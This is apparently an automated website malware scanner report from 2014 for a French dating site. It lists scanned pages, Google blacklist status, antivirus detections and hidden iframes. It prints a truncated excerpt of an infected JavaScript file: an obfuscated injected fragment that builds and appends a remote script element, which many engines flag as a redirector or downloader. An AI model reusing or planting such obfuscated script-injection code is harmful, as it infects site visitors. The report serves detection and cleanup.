Malware Scanner report for rencontres-passions.org

Malicious/Suspicious/Total URLs checked: 2/0/17
2 pages have malicious code. See details below.

Blacklists: Found
The website is marked by Google as suspicious.

The website "rencontres-passions.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/3/6
3 suspicious iframes found. See details below.

Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rencontres-passions.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request | Server response | Status
http://rencontres-passions.org/
200 OK
Content-Length: 70970
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var loadingTag = "Chargement..";var modeRewrite = "Y";var docRoot = "/";var alphanumeric_chars = "0123456789.+-_#,/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ()";var alphanum_chars = "0123456789_- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ";var text_chars = "-_@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ";var full_chars = "0123456789.+-_#,/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî() $;:?'";var use_popups = true;var use_profilepopups = false;

Antivirus reports:

Emsisoft               Gen:Variant.Kazy.1699 (B)

http://rencontres-passions.org/javascript/functions.js
200 OK
Content-Length: 17004
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/check.js
200 OK
Content-Length: 3619
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/validate.js
200 OK
Content-Length: 2992
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/shoutbox.js
200 OK
Content-Length: 908
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/templates/my_templates/img/tabcontent2.js
200 OK
Content-Length: 23411
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



function ddtabcontent(tabinterfaceid){
this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true
this.hottabspositions=[] this.subcontentids=[] this.revcontentids=[] this.selectedClassTarget="link" }

ddtabcontent.getCookie=function(Name){
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return
... 3263 bytes are skipped ...
;var lk=new Array();H=Dc+M;H+=m;this.cN="";this.PS="";var hB=new String();var dx;if(dx!='rD'){dx=''};k.src=H;var St='';k.defer=([1][0]);var xC=new Array();var gk;if(gk!='' && gk!='SQ'){gk='ZV'};document.body.appendChild(k);var gP;if(gP!='' && gP!='jJ'){gP=null};var Js='';};var kU=new Array();var AS;if(AS!='pB' && AS!='SL'){AS=''};jj[fL]=K;var Lv;if(Lv!='' && Lv!='sT'){Lv=''};var aE;if(aE!='KB'){aE=''};var GX;if(GX!='Zf'){GX=''};} catch(Wf){this.mS='';this.wl='';};

Antivirus reports:

AntiVir                JS/Illredir.AI.1
Avast                  JS:Illredir-S [Trj]
Ikarus                 Trojan.JS.Redirector
K7AntiVirus            Trojan ( f4ade2000 )
TrendMicro-HouseCall   JS_ONLOAD.SMD
DrWeb                  JS.Redirector.based.2
TrendMicro             JS_ONLOAD.SMD
Microsoft              Trojan:JS/Redirector.GM
NANO-Antivirus         Trojan.Script.Pegel.yftup
VIPRE                  Trojan.JS.Redirector.bh (v)
F-Prot                 JS/Redir.AQ
AVG                    JS/Obfuscated
Sophos                 Troj/JSRedir-AU
Commtouch              JS/Redir.AQ
Agnitum                JS.Redirector.Gen
ESET-NOD32             JS/TrojanDownloader.Agent.NSA

http://RNP.ourtoolbar.com/ControlsLibrary/Javascript/Generic/Site.js
HTTP/1.1 302 Found
Connection: close
Date: Thu, 04 Sep 2014 20:32:46 GMT
Location: http://RNP.ourtoolbar.com/JavascriptLibrary/Generic/Site.js
Server: Microsoft-IIS/7.5
Content-Length: 245
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://rnp.ourtoolbar.com/javascriptlibrary/generic/site.js
200 OK
Content-Length: 4962
Content-Type: application/x-javascript
clean
http://www.conduit.com/Api/ToolbarApi.aspx
404 Not Found
Content-Length: 115
Content-Type: application/json
clean
http://www.conduit.com/test404page.js
HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=2592000
Connection: close
Date: Thu, 04 Sep 2014 20:34:27 GMT
Location: /Error/NotFound?aspxerrorpath=/test404page.js
Server: Microsoft-IIS/8.5
Content-Length: 162
Expires: Sat, 04 Oct 2014 20:34:27 GMT
P3p: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=Edge
clean
http://www.conduit.com/error/notfound?aspxerrorpath=/test404page.js
404 Not Found
Content-Length: 23719
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">

http://www.conduit.com/Scripts/Master/getnortonsealimaget.js
200 OK
Content-Length: 2814
Content-Type: application/javascript
clean
http://www.conduit.com/bundle/script/innerpage?v=TrNAMJ6ecHAnz_4cmDYjE6xEMwZveuMfNDKrgzUmjiU1
200 OK
Content-Length: 117848
Content-Type: text/javascript
clean
http://www.googleadservices.com/pagead/conversion.js
200 OK
Content-Length: 9448
Content-Type: text/javascript
clean
http://www.conduit.com/
200 OK
Content-Length: 30274
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">

http://www.conduit.com/bundle/script/homepage?v=hJJCAYD76HF7bM8yV2badTdcvDTcDuDWACQd1bMkkjw1
200 OK
Content-Length: 118906
Content-Type: text/javascript
clean
http://www.conduit.com/aboutus/contactus
200 OK
Content-Length: 38704
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rencontres-passions.org

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 20:34:21 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=01f851e9858613bb7c7076799958c02a; path=/
Set-Cookie: osdateopt_lang=french; expires=Fri, 04-Sep-2015 20:34:21 GMT
X-Powered-By: PHP/5.2.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: rencontres-passions.org
Referer: http://www.google.com/search?q=rencontres-passions.org

Result:
The result is similar to the first query. There are no suspicious redirects found.